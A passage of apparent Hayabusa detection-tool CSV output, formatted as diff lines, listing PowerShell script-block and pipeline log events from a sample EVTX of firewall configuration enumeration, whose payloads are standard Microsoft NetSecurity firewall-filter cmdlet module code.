$script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('InterfaceType') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${InterfaceType}) $__cmdletization_queryBuilder.FilterByProperty('InterfaceType', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallRule') -and (@('ByAssociatedNetFirewallRule') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallRule}, 'MSFT_NetFirewallRuleFilterByInterfaceType', 'GroupComponent', 'PartComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecRule') -and (@('ByAssociatedNetIPsecRule') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecRule}, 'MSFT_NetConSecRuleFilterByInterfaceType', 'GroupComponent', 'PartComponent', 'Default') } if ($PSBoundParameters.ContainsKey('All') -and (@('GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('All', ${All}) } if ($PSBoundParameters.ContainsKey('PolicyStore') -and (@('ByQuery', 'ByAssociatedNetFirewallRule', 'ByAssociatedNetIPsecRule', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { 
$__cmdletization_queryBuilder.AddQueryOption('PolicyStore', ${PolicyStore}) } if ($PSBoundParameters.ContainsKey('GPOSession') -and (@('ByQuery', 'ByAssociatedNetFirewallRule', 'ByAssociatedNetIPsecRule', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('GPOSession', ${GPOSession}) } $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder) } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetFirewallInterfaceTypeFilter.cmdletDefinition.cdxml-Help.xml }",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx
+2021-10-25 16:23:05.879 +09:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,"function Set-NetFirewallInterfaceTypeFilter { [CmdletBinding(DefaultParameterSetName='Query (cdxml)', SupportsShouldProcess=$true, ConfirmImpact='Medium', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetInterfaceTypeFilter')] param( [Parameter(ParameterSetName='Query (cdxml)')] [string] ${PolicyStore}, [Parameter(ParameterSetName='Query (cdxml)')] [string] ${GPOSession}, [Parameter(ParameterSetName='InputObject (cdxml)', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#MSFT_NetInterfaceTypeFilter')] [ValidateNotNull()] [ciminstance[]] ${InputObject}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.InterfaceType] 
${InterfaceType}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Alias('Session')] [ValidateNotNullOrEmpty()] [Microsoft.Management.Infrastructure.CimSession[]] ${CimSession}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${AsJob}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${PassThru}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = Microsoft.PowerShell.Utility\New-Object $script:ObjectModelWrapper $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('PolicyStore') -and (@('Query (cdxml)') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('PolicyStore', ${PolicyStore}) } if ($PSBoundParameters.ContainsKey('GPOSession') -and (@('Query (cdxml)') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('GPOSession', 
${GPOSession}) } $__cmdletization_methodParameters = Microsoft.PowerShell.Utility\New-Object System.Collections.Generic.List[Microsoft.PowerShell.Cmdletization.MethodParameter] switch -exact ($PSCmdlet.ParameterSetName) { { @('Query (cdxml)', 'InputObject (cdxml)') -contains $_ } { [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('InterfaceType')) { [object]$__cmdletization_value = ${InterfaceType} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'InterfaceType'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.InterfaceType'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'InterfaceType'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.InterfaceType'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) $__cmdletization_returnValue = $null $__cmdletization_methodInvocationInfo = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodInvocationInfo @('cim:ModifyInstance', $__cmdletization_methodParameters, $__cmdletization_returnValue) $__cmdletization_passThru = $PSBoundParameters.ContainsKey('PassThru') -and $PassThru if ($PSBoundParameters.ContainsKey('InputObject')) { foreach ($x in $InputObject) { $__cmdletization_objectModelWrapper.ProcessRecord($x, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } else { $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } } } } catch 
{ $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetFirewallInterfaceTypeFilter.cmdletDefinition.cdxml-Help.xml }",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx +2021-10-25 16:23:05.879 +09:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log," 1.0.0.0 NetFirewallSecurityFilter ",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx +2021-10-25 16:23:05.879 +09:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,"#requires -version 3.0 if ($(Microsoft.PowerShell.Core\Get-Command Set-StrictMode -Module Microsoft.PowerShell.Core)) { Microsoft.PowerShell.Core\Set-StrictMode -Off } $script:MyModule = $MyInvocation.MyCommand.ScriptBlock.Module $script:ClassName = 'root/standardcimv2/MSFT_NetNetworkLayerSecurityFilter' $script:ClassVersion = '1.0.0' $script:ModuleVersion = '1.0.0.0' $script:ObjectModelWrapper = 'Microsoft.PowerShell.Cmdletization.Cim.CimCmdletAdapter' $script:PrivateData = Microsoft.PowerShell.Utility\New-Object 'System.Collections.Generic.Dictionary[string,string]' Microsoft.PowerShell.Core\Export-ModuleMember -Function @() function __cmdletization_BindCommonParameters { param( $__cmdletization_objectModelWrapper, $myPSBoundParameters ) if ($myPSBoundParameters.ContainsKey('CimSession')) { $__cmdletization_objectModelWrapper.PSObject.Properties['CimSession'].Value = $myPSBoundParameters['CimSession'] } if 
($myPSBoundParameters.ContainsKey('ThrottleLimit')) { $__cmdletization_objectModelWrapper.PSObject.Properties['ThrottleLimit'].Value = $myPSBoundParameters['ThrottleLimit'] } if ($myPSBoundParameters.ContainsKey('AsJob')) { $__cmdletization_objectModelWrapper.PSObject.Properties['AsJob'].Value = $myPSBoundParameters['AsJob'] } } function Get-NetFirewallSecurityFilter { [CmdletBinding(DefaultParameterSetName='GetAll', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetNetworkLayerSecurityFilter')] param( [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Authentication[]] ${Authentication}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Encryption[]] ${Encryption}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [bool[]] ${OverrideBlockRules}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${LocalUser}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${RemoteUser}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${RemoteMachine}, [Parameter(ParameterSetName='ByAssociatedNetFirewallRule', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetFirewallRule')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallRule}, [Parameter(ParameterSetName='GetAll')] [switch] ${All}, [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallRule')] [Parameter(ParameterSetName='GetAll')] [string] ${PolicyStore}, [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallRule')] [Parameter(ParameterSetName='GetAll')] [string] ${GPOSession}, [Parameter(ParameterSetName='ByQuery')] 
[Parameter(ParameterSetName='ByAssociatedNetFirewallRule')] [Parameter(ParameterSetName='GetAll')] [Alias('Session')] [ValidateNotNullOrEmpty()] [Microsoft.Management.Infrastructure.CimSession[]] ${CimSession}, [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallRule')] [Parameter(ParameterSetName='GetAll')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallRule')] [Parameter(ParameterSetName='GetAll')] [switch] ${AsJob}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = Microsoft.PowerShell.Utility\New-Object $script:ObjectModelWrapper $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('Authentication') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Authentication}) $__cmdletization_queryBuilder.FilterByProperty('Authentication', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('Encryption') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Encryption}) 
$__cmdletization_queryBuilder.FilterByProperty('Encryption', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('OverrideBlockRules') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${OverrideBlockRules}) $__cmdletization_queryBuilder.FilterByProperty('OverrideBlockRules', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('LocalUser') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${LocalUser}) $__cmdletization_queryBuilder.FilterByProperty('LocalUsers', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('RemoteUser') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${RemoteUser}) $__cmdletization_queryBuilder.FilterByProperty('RemoteUsers', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('RemoteMachine') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${RemoteMachine}) $__cmdletization_queryBuilder.FilterByProperty('RemoteMachines', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallRule') -and (@('ByAssociatedNetFirewallRule') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallRule}, 'MSFT_NetFirewallRuleFilterBySecurity', 'GroupComponent', 'PartComponent', 'Default') } if ($PSBoundParameters.ContainsKey('All') -and (@('GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('All', ${All}) } if ($PSBoundParameters.ContainsKey('PolicyStore') -and (@('ByQuery', 'ByAssociatedNetFirewallRule', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('PolicyStore', ${PolicyStore}) } if ($PSBoundParameters.ContainsKey('GPOSession') -and (@('ByQuery', 'ByAssociatedNetFirewallRule', 'GetAll') 
-contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('GPOSession', ${GPOSession}) } $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder) } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetFirewallSecurityFilter.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'Get-NetFirewallSecurityFilter' function Set-NetFirewallSecurityFilter { [CmdletBinding(DefaultParameterSetName='Query (cdxml)', SupportsShouldProcess=$true, ConfirmImpact='Medium', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetNetworkLayerSecurityFilter')] param( [Parameter(ParameterSetName='Query (cdxml)')] [string] ${PolicyStore}, [Parameter(ParameterSetName='Query (cdxml)')] [string] ${GPOSession}, [Parameter(ParameterSetName='InputObject (cdxml)', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#MSFT_NetNetworkLayerSecurityFilter')] [ValidateNotNull()] [ciminstance[]] ${InputObject}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Authentication] ${Authentication}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Encryption] ${Encryption}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [bool] ${OverrideBlockRules}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string] ${LocalUser}, [Parameter(ParameterSetName='Query 
(cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string] ${RemoteUser}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string] ${RemoteMachine}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Alias('Session')] [ValidateNotNullOrEmpty()] [Microsoft.Management.Infrastructure.CimSession[]] ${CimSession}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${AsJob}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${PassThru}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = Microsoft.PowerShell.Utility\New-Object $script:ObjectModelWrapper $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('PolicyStore') -and (@('Query (cdxml)') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('PolicyStore', 
${PolicyStore}) } if ($PSBoundParameters.ContainsKey('GPOSession') -and (@('Query (cdxml)') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('GPOSession', ${GPOSession}) } $__cmdletization_methodParameters = Microsoft.PowerShell.Utility\New-Object System.Collections.Generic.List[Microsoft.PowerShell.Cmdletization.MethodParameter] switch -exact ($PSCmdlet.ParameterSetName) { { @('Query (cdxml)', 'InputObject (cdxml)') -contains $_ } { [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Authentication')) { [object]$__cmdletization_value = ${Authentication} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'Authentication'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Authentication'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'Authentication'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Authentication'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Encryption')) { [object]$__cmdletization_value = ${Encryption} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'Encryption'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Encryption'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } 
else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'Encryption'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Encryption'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('OverrideBlockRules')) { [object]$__cmdletization_value = ${OverrideBlockRules} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'OverrideBlockRules'; ParameterType = 'System.Boolean'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'OverrideBlockRules'; ParameterType = 'System.Boolean'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('LocalUser')) { [object]$__cmdletization_value = ${LocalUser} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'LocalUsers'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'LocalUsers'; ParameterType = 'System.String'; 
Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('RemoteUser')) { [object]$__cmdletization_value = ${RemoteUser} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'RemoteUsers'; ParameterTyp",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx +2021-10-25 16:23:05.879 +09:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,"e = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'RemoteUsers'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('RemoteMachine')) { [object]$__cmdletization_value = ${RemoteMachine} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'RemoteMachines'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object 
Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'RemoteMachines'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) $__cmdletization_returnValue = $null $__cmdletization_methodInvocationInfo = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodInvocationInfo @('cim:ModifyInstance', $__cmdletization_methodParameters, $__cmdletization_returnValue) $__cmdletization_passThru = $PSBoundParameters.ContainsKey('PassThru') -and $PassThru if ($PSBoundParameters.ContainsKey('InputObject')) { foreach ($x in $InputObject) { $__cmdletization_objectModelWrapper.ProcessRecord($x, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } else { $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetFirewallSecurityFilter.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'Set-NetFirewallSecurityFilter'",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx +2021-10-25 16:23:05.895 +09:00,FS03.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Get-Command): ""Get-Command"" ParameterBinding(Get-Command): name=""Module""; value=""Microsoft.PowerShell.Core"" ParameterBinding(Get-Command): name=""Name""; 
value=""Set-StrictMode""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx +2021-10-25 16:23:05.895 +09:00,FS03.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Set-StrictMode): ""Set-StrictMode"" ParameterBinding(Set-StrictMode): name=""Off""; value=""True""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx +2021-10-25 16:23:05.895 +09:00,FS03.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(New-Object): ""New-Object"" ParameterBinding(New-Object): name=""TypeName""; value=""System.Collections.Generic.Dictionary[string,string]""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx +2021-10-25 16:23:05.895 +09:00,FS03.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Export-ModuleMember): ""Export-ModuleMember"" ParameterBinding(Export-ModuleMember): name=""Function""; value=""""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx +2021-10-25 16:23:05.895 +09:00,FS03.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Export-ModuleMember): ""Export-ModuleMember"" ParameterBinding(Export-ModuleMember): 
